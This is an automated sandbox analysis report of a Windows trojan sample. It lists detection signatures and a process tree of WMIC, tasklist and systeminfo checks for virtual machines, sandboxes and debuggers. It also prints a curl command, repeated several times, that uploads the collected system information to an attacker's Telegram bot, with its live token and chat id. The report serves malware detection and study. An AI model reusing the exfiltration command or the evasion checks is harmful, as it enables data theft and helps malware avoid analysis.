Windows Analysis Report
9KEZfGRjyK.exe

Overview

General Information

Sample name: 9KEZfGRjyK.exe (renamed because the original name is a hash value)
Original sample name: 73b0e64dcc0df2f2ac4d461245021e6a.exe
Analysis ID: 1578571
MD5: 73b0e64dcc0df2f2ac4d461245021e6a
SHA1: ff75ef00e33fb953964d6bbe1d86d5ad8bb8c9ba
SHA256: 99a4d0ac34848d665529220a0a04edd2753aba9ffe8434286967875d05643400
Tags: exe, user-meanjellybeanx

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to detect virtual machines
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • 9KEZfGRjyK.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\9KEZfGRjyK.exe" MD5: 73B0E64DCC0DF2F2AC4D461245021E6A)
    • WMIC.exe (PID: 7548 cmdline: "wmic" bios get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7612 cmdline: "wmic" baseboard get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7676 cmdline: "wmic" cpu get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7748 cmdline: "wmic" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7836 cmdline: "wmic" diskdrive get model,size MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7900 cmdline: "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • getmac.exe (PID: 7964 cmdline: "getmac" MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • systeminfo.exe (PID: 8080 cmdline: "systeminfo" MD5: EE309A9C61511E907D87B10EF226FDCD)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 8164 cmdline: "tasklist" /m sbiedll.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7296 cmdline: "tasklist" /m dbghelp.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 1188 cmdline: "tasklist" /m api_log.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 1804 cmdline: "tasklist" /m dir_watch.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7204 cmdline: "tasklist" /m pstorec.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 4180 cmdline: "tasklist" /m vmcheck.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7568 cmdline: "tasklist" /m wpespy.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7556 cmdline: "wmic" computersystem get model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7620 cmdline: "tasklist" /fi "IMAGENAME eq vmtoolsd.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7712 cmdline: "tasklist" /fi "IMAGENAME eq vboxservice.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7772 cmdline: "tasklist" /fi "IMAGENAME eq vboxtray.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7868 cmdline: "wmic" csproduct get identifyingnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 5780 cmdline: "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=528110-4174-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7556, StartAddress: 213032B0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7556
No Suricata rule has matched

AV Detection

Source: 9KEZfGRjyK.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B901CBF0 BCryptGenRandom,SystemFunction036,BCryptGenRandom,SystemFunction036
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: 9KEZfGRjyK.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: data.pdb source: 9KEZfGRjyK.exe
Source: Binary string: data.pdb)444 source: 9KEZfGRjyK.exe
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B902EB20 CloseHandle,FindFirstFileW,FindClose

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
  POST /bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument HTTP/1.1
  Host: api.telegram.org
  User-Agent: curl/7.83.1
  Accept: */*
  Content-Length: 3664
  Content-Type: multipart/form-data; boundary=------------------------cdbe2087272a7b9c
Source: curl.exe, 0000002D.00000003.2464902792.0000025DD64DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
Source: curl.exe, 0000002D.00000002.2465503271.0000025DD64C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentC:
Source: curl.exe, 0000002D.00000002.2465599836.0000025DD64DF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2464866626.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465157934.0000025DD64DF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2464902792.0000025DD64DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentLC
Source: curl.exe, 0000002D.00000003.2464866626.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465008395.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465157934.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentapi.telegram.
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o.txt1q
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/botc
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/botctK.exe
Source: 9KEZfGRjyK.exe | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2

System Summary

Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue (12 identical entries)
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B902F0E0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B902F200 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code functions: 0_2_00007FF7B902FDF0, 0_2_00007FF7B90318F0, 0_2_00007FF7B9012720, 0_2_00007FF7B9045A90, 0_2_00007FF7B9039AF0, 0_2_00007FF7B9043930, 0_2_00007FF7B9042C20, 0_2_00007FF7B9046CA0, 0_2_00007FF7B901FCF0, 0_2_00007FF7B902BB60, 0_2_00007FF7B904EF00, 0_2_00007FF7B902E060, 0_2_00007FF7B9046080, 0_2_00007FF7B903D000, 0_2_00007FF7B9027130, 0_2_00007FF7B9041140, 0_2_00007FF7B90423B0, 0_2_00007FF7B9037520, 0_2_00007FF7B9011810
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: String function: 00007FF7B901F4E0 appears 69 times
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: String function: 00007FF7B90453F0 appears 61 times
Source: system_info.txt.0.dr | Binary string: EC-F4-BB-EA-15-88 \Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: system_info.txt.0.dr | Binary string: Boot Device: \Device\HarddiskVolume1
Source: classification engine | Classification label: mal72.troj.evad.winEXE@64/2@1/2
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B902F330 GetModuleHandleW,FormatMessageW,GetLastError
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | File created: C:\Users\user\Desktop\system_info.txt
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:<PID>:120:WilError_03 for PIDs 7556, 7972, 7608, 8088, 1608, 7288, 7684, 8172, 2256, 7756, 7908, 7692, 7764, 2476, 4600, 7864, 7620, 4592, 7632, 7844
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: 9KEZfGRjyK.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (2 identical entries)
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process (7 identical entries)
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\9KEZfGRjyK.exe "C:\Users\user\Desktop\9KEZfGRjyK.exe"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get name
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemory
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,size
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\getmac.exe "getmac"
Source: C:\Windows\System32\getmac.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\systeminfo.exe "systeminfo"
Source: C:\Windows\System32\systeminfo.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dll
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get model
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumber
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\getmac.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=528110-4174-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
Source: C:\Windows\System32\curl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get nameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemoryJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,sizeJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayNameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\getmac.exe "getmac"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=528110-4174-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
